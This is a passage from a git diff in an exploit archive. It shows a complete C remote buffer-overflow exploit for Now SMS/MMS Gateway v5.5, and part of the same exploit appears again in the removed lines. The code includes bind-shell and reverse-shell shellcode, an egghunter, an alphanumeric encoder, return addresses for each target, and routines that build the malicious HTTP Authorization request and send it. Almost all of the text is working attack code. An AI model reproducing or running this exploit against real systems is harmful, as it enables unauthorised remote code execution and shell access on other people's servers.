remotehost, int port) -{ - int x; - SOCKET s ; - - s = hr2_connect(remotehost, port, 10000); - if(s==0) - { - printf(" [-] connect() timeout\n"); - return 0; - } - if(s==SOCKET_ERROR) - { - printf(" [-] Connection failed\n"); - return 0; - } - x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0); - printf(" [+] Sent %d out of %d bytes\n", x, abuf->size); - - closesocket(s); - return 1; -} - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring) -{ - static char *next = NULL; - if (optind == 0) - next = NULL; - - optarg = NULL; - - if (next == NULL || *next == '\0') - { - if (optind == 0) - optind++; - - if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') - { - optarg = NULL; - if (optind < argc) - optarg = argv[optind]; - return EOF; - } - - if (strcmp(argv[optind], "--") == 0) - { - optind++; - optarg = NULL; - if (optind < argc) - optarg = argv[optind]; - return EOF; - } - - next = argv[optind]; - next++; // skip past - - optind++; - } - - char c = *next++; - char *cp = strchr(optstring, c); - - if (cp == NULL || c == ':') - return '?'; - - cp++; - if (*cp == ':') - { - if (*next != '\0') - { - optarg = next; - next = NULL; - } - else if (optind < argc) - { - optarg = argv[optind]; - optind++; - } - else - { - return '?'; - } - } - - return c; -} -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - - - -// ----------------------------------------------------------------- -// BASE64 -// ----------------------------------------------------------------- -char base64_chars[] = - "ABCDEFGHIJKLMNOPQRSTUVWXYZ" - "abcdefghijklmnopqrstuvwxyz" - "0123456789+/"; - - -static inline bool is_base64(unsigned char c) { - return (isalnum(c) || (c 
== '+') || (c == '/')); -} - -void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) -{ - int i = 0; - int j = 0; - unsigned char char_array_3[3]; - unsigned char char_array_4[4]; - - while (in_len--) - { - char_array_3[i++] = *(bytes_to_encode++); - if (i == 3) { - char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; - char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); - char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); - char_array_4[3] = char_array_3[2] & 0x3f; - - for(i = 0; (i <4) ; i++) - ret[strlen(ret)]=base64_chars[char_array_4[i]]; - i = 0; - } - } - - if (i) - { - for(j = i; j < 3; j++) - char_array_3[j] = '\0'; - - char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; - char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); - char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); - char_array_4[3] = char_array_3[2] & 0x3f; - - for (j = 0; (j < i + 1); j++) - ret[strlen(ret)]=base64_chars[char_array_4[j]]; - - while((i++ < 3)) - ret[strlen(ret)]='='; - - } - - -} - -// ----------------------------------------------------------------- -// End of BASE64 -// ----------------------------------------------------------------- - - - - -void print_info_banner_line(const char * key, const char * val) -{ - char temp1[100], temp2[100]; - - memset(temp1,0,sizeof(temp1)); - memset(temp1, '\x20' , 58 - strlen(val) -1); - - memset(temp2,0,sizeof(temp2)); - memset(temp2, '\x20' , 8 - strlen(key)); - printf(" # %s%s: %s%s# \n", key, temp2, val, temp1); - -} - - - -void usage(char * s) -{ - int j; - printf("\n"); - printf(" Usage: %s -h -t -R \n", s); - printf(" -------------------------------------------------------------------\n"); - printf(" Arguments:\n"); - printf(" -h ........ host to attack, default port: 8800\n"); - printf(" -t ........ target to use\n"); - printf(" -R ........ 
host and port for back connect\n"); - printf(" -T ........ socket timeout\n"); - printf("\n"); - printf(" Supported ASUS DPCProxy versions:\n"); - for(j=0; targets[j].t!=0;j++) - { - printf(" %d. %s\n",j+1, targets[j].t); - } - printf("\n"); - for(j=0; shellcodes[j].name!=0;j++) - { - printf(" %d. %s\n",j+1, shellcodes[j].name); - } - end_logo(); -} - -void logo() -{ - printf("\n\n"); - printf(" ####################################################################### \n"); - printf(" # ____ __ _ ______ __ _____ #\n"); - printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); - printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); - printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); - printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); - printf(" # crew #\n"); - printf(" ####################################################################### \n"); - printf(" # Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit # \n"); - printf(" # Author : Heretic2 (http://www.dreatica.cl/) # \n"); - printf(" # Version : 1.0 # \n"); - printf(" # System : Windows ALL # \n"); - printf(" # Date : 14.04.2008 # \n"); - printf(" # ------------------------------------------------------------------- # \n"); -} - -void end_logo() -{ - printf(" # ------------------------------------------------------------------- # \n"); - printf(" # Dreatica-FXP crew [Heretic2] # \n"); - printf(" ####################################################################### \n\n"); -} - -// milw0rm.com [2008-05-29] +/* Dreatica-FXP crew +* +* ---------------------------------------- +* Target : Now SMS/MMS Gateway v5.5 and others +* ---------------------------------------- +* Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit +* Exploit date : 14.04.2008 +* Exploit writer : Heretic2 (heretic2x@gmail.com) +* OS : Windows ALL +* Tested : Windows 2000 Server +* Crew : Dreatica-FXP +* Location : 
http://www.milw0rm.com/ +* ---------------------------------------- +* Info : We obtain EIP after sending a long Authentificate request to server +* Egghunter help here. +* ---------------------------------------- +* Thanks to: +* 1. Luigi Auriemma ( http://aluigi.org ) +* 2. The Metasploit project ( http://metasploit.com ) +* 3. ALPHA 2: Zero-tolerance ( ) +* 4. Dreatica-FXP crew ( ) +************************************************************************************ +* This was written for educational purpose only. Use it at your own risk. Author will be not be +* responsible for any damage, caused by that code. +*/ + +#include +#include +#include +#include +#include + +#pragma comment(lib,"ws2_32") + + +void usage(char * s); +void logo(); +void end_logo(); +void print_info_banner_line(const char * key, const char * val); + +void extract_ip_and_port( char * &remotehost, int * port, char * str); +int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx); +void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret); + +int hr2_connect(char * remotehost, int port, int timeout); +int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout); +int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout); +int execute(struct _buf * abuf, char * remotehost, int port); + +struct _buf +{ + unsigned char * ptr; + unsigned int size; +}; +int construct_shellcode(int sh, struct _buf * shf, int target,char * rerverseip, int reverseport); +int construct_buffer(struct _buf * shf, int target, struct _buf * abuf); + + + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring); +char *optarg; // global argument pointer +int optind = 0, opterr; // global argv 
index +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + +struct { + const char * name; + int length; + char *shellcode; +}shellcodes[]={ + {"Bindshell, port 4444 [ args: none ]", 696, + /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" + "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32" + "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62" + "\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71" + "\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c" + "\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47" + "\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35" + "\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c" + "\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a" + "\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a" + "\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64" + "\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34" + "\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50" + "\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64" + "\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31" + "\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69" + "\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30" + "\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78" + "\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f" + "\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73" + "\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e" + "\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62" + 
"\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71" + "\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65" + "\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32" + "\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e" + "\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69" + "\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79" + "\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d" + "\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49" + "\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70" + "\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45" + "\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36" + "\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32" + "\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e" + "\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50" + "\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32" + "\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a" + "\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48" + "\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30" + "\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39" + "\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b" + "\x4f\x6a\x76\x6b\x4f\x78\x50\x42" + }, + {"ReverseShell [ args: -R ]", + 287, + /* + * windows/shell_reverse_tcp - 287 bytes + * http://www.metasploit.com + * Encoder: generic/none + */ + "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b" + "\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01" + "\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07" + "\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" + "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" + "\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c" + 
"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff" + "\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" + "\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08" + "\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53" + "\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66" + "\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" + "\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a" + "\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" + "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68" + "\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" + "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff" + "\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04" + "\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6" + "\xff\xd0" + }, + {NULL, 0, NULL} +}; + + + + +struct _target{ + const char *t ; + unsigned long ret ; +} targets[]= +{ + {"Now SMS/MMS Gateway universal", 0x10002f9d }, + {"Now SMS/MMS Gateway v5.5", 0x0027727c }, + {"DOS/Crash/Debug/Test/Fun", 0x41414141 }, + {NULL, 0x00000000 } +}; + + +char egghunter[] = + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05" + "\x5a\x74\xef\xb8\x44\x46\x58\x50\x8b\xfa\xaf\x75\xea\xaf\x75\xe7" + "\xff\xe7"; + +char header_b[] = + "GET / HTTP/1.0\r\n" + "User-Agent: "; +char header_m[] ="\r\n" + "Authorization: Basic "; +char header_e[] = "\r\n\r\n"; + + +// memory for buffers +unsigned char payloadbuffer[10000], a_buffer[10000]; +long dwTimeout=5000; +int timeout=5000; + +// alphanumeric decoder took from "ALPHA 2: Zero-tolerance." code +char alphanum_decoder[] = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41" + "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" + "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"; +// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." 
code +int alphanumeric_exec(char *to_encode, int len, char *encoded, int * rlen ) +{ + int i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode); + char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars + char temp[10]; + memset(temp, 0 , sizeof(temp)); + srand((int)clock()); + for(ii=0;ii> 4; + B = (input & 0x0f); + F = B; + i = rand() % ((int)strlen(valid_chars)); + while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); } + E = valid_chars[i] >> 4; + D = (A^E); + i = rand() % ((int)strlen(valid_chars)); + while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); } + C = valid_chars[i] >> 4; + sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F); + encoded[strlen(encoded)]=temp[0]; + encoded[strlen(encoded)]=temp[1]; + } + encoded[strlen(encoded)]='A'; + *rlen=(int)strlen(encoded); + return 1; + +} + +int main(int argc, char **argv) +{ + char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100]; + int HAVE_R=0,HAVE_U=0,sh,port=8800,itarget=0,reverseport=9999; + struct _buf fshellcode, sbuffer; + + logo(); + if(argc<2) + { + usage(argv[0]); + return -1; + } + + WSADATA wsa; + WSAStartup(MAKEWORD(2,0), &wsa); + // set defaults + sh=0; + // ------------ + + while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF) + { + switch (c) + { + case 'h': + if (strchr(optarg,':')==NULL) + { + remotehost=optarg; + }else + { + sscanf(strchr(optarg,':')+1, "%d", &port); + remotehost=optarg; + *(strchr(remotehost,':'))='\0'; + } + break; + case 't': + sscanf(optarg, "%d", &itarget); + itarget--; + break; + case 'R': + HAVE_R=1; + if (strchr(optarg,':')==NULL) + { + reverseip=optarg; + }else + { + sscanf(strchr(optarg,':')+1, "%d", &reverseport); + reverseip=optarg; + *(strchr(reverseip,':'))='\0'; + } + break; + case 'T': + sscanf(optarg, "%ld", &dwTimeout); + break; + default: + usage(argv[0]); + WSACleanup(); + return -1; + } + } + sh=HAVE_R; + + if(remotehost == NULL) + { + printf(" [-] 
Please enter remotehost\n"); + end_logo(); + WSACleanup(); + return -1; + } + print_info_banner_line("Host", remotehost); + sprintf(temp1, "%d", port); + print_info_banner_line("Port", temp1); + print_info_banner_line("Payload", shellcodes[sh].name); + + if(sh==0) + { + sprintf(temp1, "%d", 4444); + print_info_banner_line("BINDPort", temp1); + } + if(sh==1) + { + print_info_banner_line("CB IP", reverseip); + sprintf(temp1, "%d", reverseport); + print_info_banner_line("CB port", temp1); + } + printf(" # ------------------------------------------------------------------- # \n"); + fflush(stdout); + + + memset(payloadbuffer, 0, sizeof(payloadbuffer)); + fshellcode.ptr=payloadbuffer; + fshellcode.size=0; + + memset(a_buffer, 0, sizeof(a_buffer)); + sbuffer.ptr=a_buffer; + sbuffer.size=0; + + if(!construct_shellcode(sh, &fshellcode, itarget, reverseip, reverseport)) + { + end_logo(); + WSACleanup(); + return -1; + } + + printf(" [+] Payload constructed\n"); + + if(!construct_buffer(&fshellcode, itarget, &sbuffer)) + { + printf(" [-] Buffer not constructed\n"); + end_logo(); + WSACleanup(); + return -1; + } + printf(" [+] Final buffer constructed\n"); + + + if(!execute(&sbuffer, remotehost, port)) + { + printf(" [-] Buffer not sent\n"); + end_logo(); + WSACleanup(); + return -1; + } + printf(" [+] Buffer sent\n"); + + end_logo(); + WSACleanup(); + return 0; +} +int construct_shellcode(int sh, struct _buf * shf, int target, char * rerverseip, int reverseport) +{ + int x; + char fsh[1000]; + + memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length); + shf->size=shellcodes[sh].length; + if(sh==1) + { + memset(shf->ptr,0,shf->size+1); + memset(fsh,0,sizeof(fsh)); + memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length); + + + static struct hostent *host = gethostbyname(rerverseip); + static struct sockaddr_in addr; + if(host == NULL) + { + printf(" [-] Reverse ip/hostanme is invalid\n"); + return 0; + } + + addr.sin_addr = *(struct in_addr*)host->h_addr; + 
fsh[160] = (addr.sin_addr.S_un.S_un_b.s_b1) ; + fsh[161] = (addr.sin_addr.S_un.S_un_b.s_b2) ; + fsh[162] = (addr.sin_addr.S_un.S_un_b.s_b3) ; + fsh[163] = (addr.sin_addr.S_un.S_un_b.s_b4) ; + + fsh[166] = ((reverseport >> 8) & 0xff) ; + fsh[167] = ((reverseport ) & 0xff) ; + + memcpy(shf->ptr,alphanum_decoder,sizeof(alphanum_decoder)-1); + alphanumeric_exec(fsh, shellcodes[sh].length, (char*)(shf->ptr+sizeof(alphanum_decoder)-1), &x); + shf->size = sizeof(alphanum_decoder)-1+x; + } + return 1; +} + +int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf) +{ + unsigned char * cp, *lp ; + char buf[10000],encoded[10000],encoded2[10000], useragent[10000]; + int len, slen; + + // + cp=(unsigned char *)useragent; + *cp++ = '\x44'; + *cp++ = '\x46'; + *cp++ = '\x58'; + *cp++ = '\x50'; + *cp++ = '\x44'; + *cp++ = '\x46'; + *cp++ = '\x58'; + *cp++ = '\x50'; + *cp++ = '\x41'; + *cp++ = '\x41'; + *cp++ = '\x41'; + memcpy(cp, shf->ptr, shf->size); + cp+=shf->size; + slen=(int)(cp-(unsigned char *)useragent); + + + // make egghunter + memset(buf, 0, sizeof(buf)); + memset(encoded, 0, sizeof(encoded)); + memset(encoded2, 0, sizeof(encoded2)); + + cp=(unsigned char *)buf; + memset(cp, '\x41', 129); + cp+=129; + + *cp++ = (unsigned char)((targets[target].ret ) & 0xff); + *cp++ = (unsigned char)((targets[target].ret >> 8) & 0xff); + *cp++ = (unsigned char)((targets[target].ret >> 16) & 0xff); + *cp++ = (unsigned char)((targets[target].ret >> 24) & 0xff); + + *cp++ = '\x90'; + *cp++ = '\x90'; + *cp++ = '\x90'; + *cp++ = '\x90'; + + memcpy(cp, egghunter, strlen(egghunter)); + cp+=strlen(egghunter); + + memset(cp, '\x42', 500); + cp+=500; + len=(int)(cp-(unsigned char * )buf); + base64_encode((const unsigned char *)buf,len,(char *)encoded); + base64_encode((const unsigned char *)encoded,strlen(encoded),(char *)encoded2); + // --- + + + cp = sbuf->ptr; + memcpy(cp, header_b,strlen(header_b)); + cp+=strlen(header_b); + memcpy(cp, useragent,slen); + cp+=slen; + memcpy(cp, 
header_m,strlen(header_m)); + cp+=strlen(header_m); + memcpy(cp, encoded2,strlen(encoded2)); + cp+=strlen(encoded2); + memcpy(cp, header_e,strlen(header_e)); + cp+=strlen(header_e); + + sbuf->size=(int)(cp-sbuf->ptr); + return 1; +} + + +void extract_ip_and_port( char * &remotehost, int * port, char * str) +{ + if (strchr(str,':')==NULL) + { + remotehost=str; + }else + { + sscanf(strchr(str,':')+1, "%d", port); + remotehost=str; + *(strchr(remotehost,':'))='\0'; + } +} + + + +int hr2_connect(char * remotehost, int port, int timeout) +{ + SOCKET s; + struct hostent *host; + struct sockaddr_in addr; + TIMEVAL stTime; + TIMEVAL *pstTime = NULL; + fd_set x; + int res; + + if (INFINITE != timeout) + { + stTime.tv_sec = timeout / 1000; + stTime.tv_usec = timeout % 1000; + pstTime = &stTime; + } + + host = gethostbyname(remotehost); + if (!host) return SOCKET_ERROR; + + addr.sin_addr = *(struct in_addr*)host->h_addr; + addr.sin_port = htons(port); + addr.sin_family = AF_INET; + + s = socket(AF_INET, SOCK_STREAM, 0); + if (s == SOCKET_ERROR) + { + closesocket(s); + return SOCKET_ERROR; + } + + unsigned long l = 1; + ioctlsocket( s, FIONBIO, &l ) ; + + connect(s, (struct sockaddr*)&addr, sizeof(addr)); + + FD_ZERO(&x); + FD_SET(s, &x); + + res = select(NULL,NULL,&x,NULL,pstTime); + if(res< 0) return SOCKET_ERROR; + if(res==0) return 0; + return (int)s; +} + + +int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout) +{ + return send(s, (char *)buf, len, 0); +} + +int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout) +{ + TIMEVAL stTime; + TIMEVAL *pstTime = NULL; + fd_set xy; + int res; + + if (INFINITE != timeout) + { + stTime.tv_sec = timeout / 1000; + stTime.tv_usec = timeout % 1000; + pstTime = &stTime; + } + FD_ZERO(&xy); + FD_SET(s, &xy); + + res = select(NULL,&xy,NULL,NULL,pstTime); + + if(res==0) return 0; + if(res<0) return -1; + + return recv(s, (char *)buf, len, 0); +} + +int execute(struct _buf * abuf, char * 
remotehost, int port) +{ + int x; + SOCKET s ; + + s = hr2_connect(remotehost, port, 10000); + if(s==0) + { + printf(" [-] connect() timeout\n"); + return 0; + } + if(s==SOCKET_ERROR) + { + printf(" [-] Connection failed\n"); + return 0; + } + x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0); + printf(" [+] Sent %d out of %d bytes\n", x, abuf->size); + + closesocket(s); + return 1; +} + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring) +{ + static char *next = NULL; + if (optind == 0) + next = NULL; + + optarg = NULL; + + if (next == NULL || *next == '\0') + { + if (optind == 0) + optind++; + + if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') + { + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + if (strcmp(argv[optind], "--") == 0) + { + optind++; + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + next = argv[optind]; + next++; // skip past - + optind++; + } + + char c = *next++; + char *cp = strchr(optstring, c); + + if (cp == NULL || c == ':') + return '?'; + + cp++; + if (*cp == ':') + { + if (*next != '\0') + { + optarg = next; + next = NULL; + } + else if (optind < argc) + { + optarg = argv[optind]; + optind++; + } + else + { + return '?'; + } + } + + return c; +} +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + + +// ----------------------------------------------------------------- +// BASE64 +// ----------------------------------------------------------------- +char base64_chars[] = + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz" + "0123456789+/"; + + +static inline bool is_base64(unsigned char c) { + return (isalnum(c) || (c 
== '+') || (c == '/')); +} + +void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) +{ + int i = 0; + int j = 0; + unsigned char char_array_3[3]; + unsigned char char_array_4[4]; + + while (in_len--) + { + char_array_3[i++] = *(bytes_to_encode++); + if (i == 3) { + char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; + char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); + char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); + char_array_4[3] = char_array_3[2] & 0x3f; + + for(i = 0; (i <4) ; i++) + ret[strlen(ret)]=base64_chars[char_array_4[i]]; + i = 0; + } + } + + if (i) + { + for(j = i; j < 3; j++) + char_array_3[j] = '\0'; + + char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; + char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); + char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); + char_array_4[3] = char_array_3[2] & 0x3f; + + for (j = 0; (j < i + 1); j++) + ret[strlen(ret)]=base64_chars[char_array_4[j]]; + + while((i++ < 3)) + ret[strlen(ret)]='='; + + } + + +} + +// ----------------------------------------------------------------- +// End of BASE64 +// ----------------------------------------------------------------- + + + + +void print_info_banner_line(const char * key, const char * val) +{ + char temp1[100], temp2[100]; + + memset(temp1,0,sizeof(temp1)); + memset(temp1, '\x20' , 58 - strlen(val) -1); + + memset(temp2,0,sizeof(temp2)); + memset(temp2, '\x20' , 8 - strlen(key)); + printf(" # %s%s: %s%s# \n", key, temp2, val, temp1); + +} + + + +void usage(char * s) +{ + int j; + printf("\n"); + printf(" Usage: %s -h -t -R \n", s); + printf(" -------------------------------------------------------------------\n"); + printf(" Arguments:\n"); + printf(" -h ........ host to attack, default port: 8800\n"); + printf(" -t ........ target to use\n"); + printf(" -R ........ 
host and port for back connect\n"); + printf(" -T ........ socket timeout\n"); + printf("\n"); + printf(" Supported ASUS DPCProxy versions:\n"); + for(j=0; targets[j].t!=0;j++) + { + printf(" %d. %s\n",j+1, targets[j].t); + } + printf("\n"); + for(j=0; shellcodes[j].name!=0;j++) + { + printf(" %d. %s\n",j+1, shellcodes[j].name); + } + end_logo(); +} + +void logo() +{ + printf("\n\n"); + printf(" ####################################################################### \n"); + printf(" # ____ __ _ ______ __ _____ #\n"); + printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n"); + printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n"); + printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n"); + printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n"); + printf(" # crew #\n"); + printf(" ####################################################################### \n"); + printf(" # Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit # \n"); + printf(" # Author : Heretic2 (http://www.dreatica.cl/) # \n"); + printf(" # Version : 1.0 # \n"); + printf(" # System : Windows ALL # \n"); + printf(" # Date : 14.04.2008 # \n"); + printf(" # ------------------------------------------------------------------- # \n"); +} + +void end_logo() +{ + printf(" # ------------------------------------------------------------------- # \n"); + printf(" # Dreatica-FXP crew [Heretic2] # \n"); + printf(" ####################################################################### \n\n"); +} + +// milw0rm.com [2008-05-29] diff --git a/platforms/windows/remote/572.pl b/platforms/windows/remote/572.pl index c8eec0130..09997002e 100755 --- a/platforms/windows/remote/572.pl +++ 